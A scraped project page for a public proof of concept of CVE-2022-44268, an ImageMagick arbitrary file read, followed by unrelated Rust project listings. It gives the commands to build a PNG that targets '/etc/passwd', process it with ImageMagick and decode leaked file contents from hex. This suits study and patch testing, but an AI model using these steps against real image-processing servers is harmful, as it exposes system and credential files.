A PoC for the CVE-2022-44268 - ImageMagick arbitrary file read

Related tags

Command-line CVE-2022-44268
Overview

CVE-2022-44268 Arbitrary File Read PoC - PNG generator

This is a proof of concept of the ImageMagick bug discovered by https://www.metabaseq.com/imagemagick-zero-days/

Tested on ImageMagick v. 7.1.0-48 and 6.9.11-60

How to use

Clone the project

git clone https://github.com/voidz0r/CVE-2022-44268

Run the project

cargo run "/etc/passwd"

Use the file with ImageMagick

convert image.png -resize 50% output.png

Analyze the resized image

identify -verbose output.png

Convert hex to str

python3 -c 'print(bytes.fromhex("23202f6574632f686f7374730a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a"))

Screens

generating payload resizing image hex result

You might also like...
Encode and decode dynamically constructed values of arbitrary shapes to/from SCALE bytes

scale-value · This crate provides a Value type, which is a runtime representation that is compatible with scale_info::TypeDef. It somewhat analogous t

Parity Technologies 15 Jun 24, 2023
A library that allows for the arbitrary inspection and manipulation of the memory and code of a process on a Linux system.
A library that allows for the arbitrary inspection and manipulation of the memory and code of a process on a Linux system.

raminspect raminspect is a crate that allows for the inspection and manipulation of the memory and code of a running process on a Linux system. It pro

Liam Germain 24 Sep 26, 2023
INFCON 2022 - Rust 크로스 플랫폼 프로그래밍 발표 자료 및 예제 코드

2022-INFCON-Rust-CrossPlatform INFCON 2022 - Rust 크로스 플랫폼 프로그래밍 발표 자료 및 예제 코드 Contents Presentation Supplement Example Core library rust-cross rust-cr

Chris Ohk 50 Dec 29, 2022
An awesome CLI tool for effectively learning Rust and more. Project winner of the RustFi 2022 hackathon
An awesome CLI tool for effectively learning Rust and more. Project winner of the RustFi 2022 hackathon

rlrn An awesome CLI tool for effectively learning Rust and more Table of Contents About The Project Built With Getting Started Prerequisites Installat

Victor Kostyuk 6 Dec 25, 2022
🎄 My solutions to Advent of Code 2022.

🎄 advent-of-code-2022 Overview This repository contains my solutions to Advent of Code 2022. I decided to take this year as an opportunity to learn R

Vighnesh Shenoy 3 Dec 15, 2022
Advent of Code 2022 (Rust)
Advent of Code 2022 (Rust)

Advent of Code 2022 🎄 | -+- A /=\ /\ /\ ___ _ __ _ __ __ __ i/ O \i / \/

Dominik Harmim 2 Dec 15, 2022
Solutions to Advent of Code 2022 puzzles

Solutions to Advent of Code 2022 puzzles

null 3 Dec 15, 2022
Advent of Code 2022 Solutions (in Rust)

Advent of Code 2022 My solutions for Advent of Code 2022, written in Rust. This repository provides a good template for anyone interested in writing t

Sam Mohr 3 Dec 2, 2022
My solutions for Advent of Code 2022, written in Rust

Template largely copied from RikvanToor/aoc-rust-template, upgraded for clap v4. This template can be forked/cloned from beeb/aoc-rust. Usage First, f

Valentin Bersier 2 Dec 15, 2022
Owner
Cristian 'void' Giustini
Security Engineer, Security Researcher and Developer. I love to break things and I get mad at the 3rd nested loop.
Cristian 'void' Giustini
GitHub
WIP / POC for using the ESP32C3 and ESP32 wifi drivers in bare-metal Rust

Wifi on ESP32C3 and ESP32 (on bare-metal Rust) About This is experimental and work-in-progress! You are welcome to experiment with it and contribute b

esp-rs 135 Jan 2, 2023
Dragonfly, POC full-stack web app DSL

Dragonfly Dragonfly is a toy DSL that explores ways to describe the structure of full-stack web applications. You should not use it in production. For

Bas Dirks 9 Mar 15, 2023
[PoC] An all-in-one preview window for the furries

previuwu An all-in-one preview window for the furries. Uses egui to render the preview window. STATUS: Proof of Concept ( ⚠️ heavy work in progress).

Arijit Basu 9 Feb 10, 2023
Prompt Description Language [POC]

Prompt Description Language (V0.1.1 POC) Description PDL (Prompt Description Language) format provides an extensible way to describe the behavior and

Alex 192 Jun 5, 2023
Traversal of tree-sitter Trees and any arbitrary tree with a TreeCursor-like interface

tree-sitter-traversal Traversal of tree-sitter Trees and any arbitrary tree with a TreeCursor-like interface. Using cursors, iteration over the tree c

Sebastian Mendez 12 Jan 8, 2023
a universal meta-transliterator that can decipher arbitrary encoding schemas, built in pure Rust

transliterati a universal meta-transliterator that can decipher arbitrary encoding schemas, built in pure Rust what does it do? You give it this: Барл

Catherine Koshka 7 Dec 21, 2022
Abuse the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code.

jscythe abuses the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code, even if t

Simone Margaritelli 301 Jan 4, 2023
AI-TOML Workflow Specification (aiTWS), a comprehensive and flexible specification for defining arbitrary Ai centric workflows.

AI-TOML Workflow Specification (aiTWS) The AI-TOML Workflow Specification (aiTWS) is a flexible and extensible specification for defining arbitrary wo

ruv 20 Apr 8, 2023
Blazingly fast interpolated LUT generator and applicator for arbitrary and popular color palettes.

lutgen-rs A blazingly fast interpolated LUT generator and applicator for arbitrary and popular color palettes. Theme any image to your dekstop colorsc

null 12 Jun 16, 2023
Animated app icons in your Dock that can run an arbitrary shell script when clicked.

Live App Icon for Mac Animated app icons in your Dock that can run an arbitrary shell script when clicked. Requirements macOS 13 (Ventura) or higher X

Daichi Fujita 13 Jun 8, 2023